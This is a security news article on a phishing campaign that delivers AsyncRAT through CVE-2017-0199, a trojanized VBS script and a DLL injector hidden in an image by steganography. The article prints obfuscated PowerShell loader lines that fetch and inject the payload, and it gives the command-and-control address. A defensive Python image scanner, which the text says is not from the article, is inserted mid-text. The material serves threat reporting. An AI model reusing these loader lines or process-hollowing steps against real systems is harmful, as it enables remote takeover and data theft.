Sophisticated malware attack uses steganography to hide malicious code
Cybersecurity researchers have uncovered a sophisticated malware campaign that uses steganography to hide malicious code inside image files. The attack chain exploits the old Microsoft Office vulnerability CVE-2017-0199 to deliver the remote access trojan AsyncRAT. The campaign spreads through phishing emails, executes in multiple stages and uses obfuscation to evade detection. Researchers point out that its danger lies in the steganography and multi-stage design, which can bypass traditional security controls.
2025-4-24 15:15:39 Author: cybersecuritynews.com

New Stego Campaign Leverages MS Office Vulnerability to Deliver AsyncRAT

Cybersecurity researchers have discovered a sophisticated malware campaign that employs steganography techniques to hide malicious code within seemingly innocent image files.

This attack chain leverages an older Microsoft Office vulnerability (CVE-2017-0199) to ultimately deliver AsyncRAT, a remote access trojan capable of providing attackers with complete control over victim systems.

The attack begins with phishing emails containing malicious Microsoft Office documents designed to exploit CVE-2017-0199, a vulnerability first reported in April 2017.


When opened, these documents trigger the download and execution of a remote HTA script without requiring any user interaction. The HTA script subsequently downloads a trojanized version of the legitimate Windows utility Prnport.vbs.

Upon execution, the compromised Prnport.vbs file constructs and executes a complex PowerShell script that downloads an image file containing hidden malicious code.

This PowerShell script looks innocent at first glance but contains multiple obfuscation techniques designed to evade detection.

Sophos researchers identified this campaign as particularly dangerous due to its multi-stage nature and use of steganography to avoid traditional security controls.

“This attack demonstrates the continuing evolution of threat actors’ techniques,” noted a Sophos analyst examining the campaign.

“By hiding malicious code within ordinary images, attackers can bypass many security solutions that don’t inspect image files for executable content.”

Campaign flow

The most innovative aspect of this attack involves the steganography technique used to hide the malicious injector DLL within a seemingly harmless image file.

When the victim opens the compromised image, they see only an ordinary photograph, unaware that malicious code is hidden inside.

The PowerShell script extracts this concealed code by locating specific Base64 markers (> and >) within the image’s data.
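The marker-bracketed Base64 extraction described above suggests a simple defender-side triage check. The following is an added example, not code from the article or from Sophos: it inspects an image file for data appended after the format's legitimate end-of-file bytes (JPEG EOI or PNG IEND), reports whether that tail is bracketed by start/end markers, and flags any long Base64 run that decodes to something with a PE header. The marker strings, the fake PE and the sample images are constructed assumptions, since the article's real markers did not survive extraction.

```python
import base64
import re
import struct

# Assumed marker strings (the article's real markers were stripped during extraction).
START_MARKER = b"<<BASE64_START>>"
END_MARKER = b"<<BASE64_END>>"
# Format magic -> bytes that legitimately end the file; anything after them was appended.
IMAGE_TRAILERS = {
    b"\xff\xd8": b"\xff\xd9",                 # JPEG: SOI ... EOI
    b"\x89PNG\r\n\x1a\n": b"IEND\xaeB`\x82",  # PNG: signature ... IEND chunk + CRC
}
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")  # only long Base64 runs are interesting

def trailing_bytes(data: bytes) -> bytes:
    """Return the bytes that follow the image's end-of-file marker (empty if none)."""
    for magic, trailer in IMAGE_TRAILERS.items():
        if data.startswith(magic):
            idx = data.rfind(trailer)  # last EOI: embedded JPEG thumbnails also end with FF D9
            return b"" if idx == -1 else data[idx + len(trailer):]
    return b""

def looks_like_pe(blob: bytes) -> bool:
    """True if blob has an MZ stub whose e_lfanew points at a 'PE\\0\\0' signature."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"

def scan_image(data: bytes) -> dict:
    """Flag appended data, marker-bracketed payloads, and Base64 runs that decode to a PE."""
    tail = trailing_bytes(data)
    result = {"trailing_bytes": len(tail),
              "marker_bracketed": START_MARKER in tail and END_MARKER in tail,
              "embedded_pe": False}
    for match in B64_RUN.finditer(tail):
        try:
            decoded = base64.b64decode(match.group(0), validate=True)
        except ValueError:
            continue  # not valid Base64 (e.g. bad length); keep looking
        if looks_like_pe(decoded):
            result["embedded_pe"] = True
            break
    return result

# Constructed samples: a stub JPEG, and the same stub with a Base64 "DLL" appended after EOI.
FAKE_PE = b"MZ" + bytes(0x3A) + struct.pack("<I", 0x40) + b"PE\x00\x00" + bytes(0x3C)
CLEAN_IMAGE = b"\xff\xd8" + bytes(16) + b"\xff\xd9"
STEGO_IMAGE = CLEAN_IMAGE + START_MARKER + base64.b64encode(FAKE_PE) + END_MARKER
```

A non-zero trailing_bytes count alone is not proof of malice (some tools append metadata), but a tail that decodes to a PE header is a strong signal worth quarantining the file and the process that fetched it.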

Stego-Campaign flow (Source – Medium)

The extracted code reveals a DLL named “Microsoft.Win32.TaskScheduler” that employs process hollowing techniques to inject the AsyncRAT payload into a legitimate MSBuild process.

This technique allows the malware to operate under the guise of a trusted Windows process, making detection significantly more difficult.

$injectorReflection = [Reflection.Assembly]::('Lo' + 'ad')($decodedInjector);
$executeMethod = [dnlib.IO.Home].('GetM' + 'ethod')('VAI').('Inv' + 'oke')($null, @($finalPayloadURL, $null, $null, $null, "MsBuild"))
The process hollowing flow used in this attack (Source – Medium)

The final payload, AsyncRAT, communicates with command and control servers at 148.113.214.176:7878.

This open-source remote access tool provides attackers with extensive capabilities including remote desktop access, keylogging, and the ability to deploy additional malware including ransomware.



Article source: https://cybersecuritynews.com/new-stego-campaign-leverages-ms-office-vulnerability/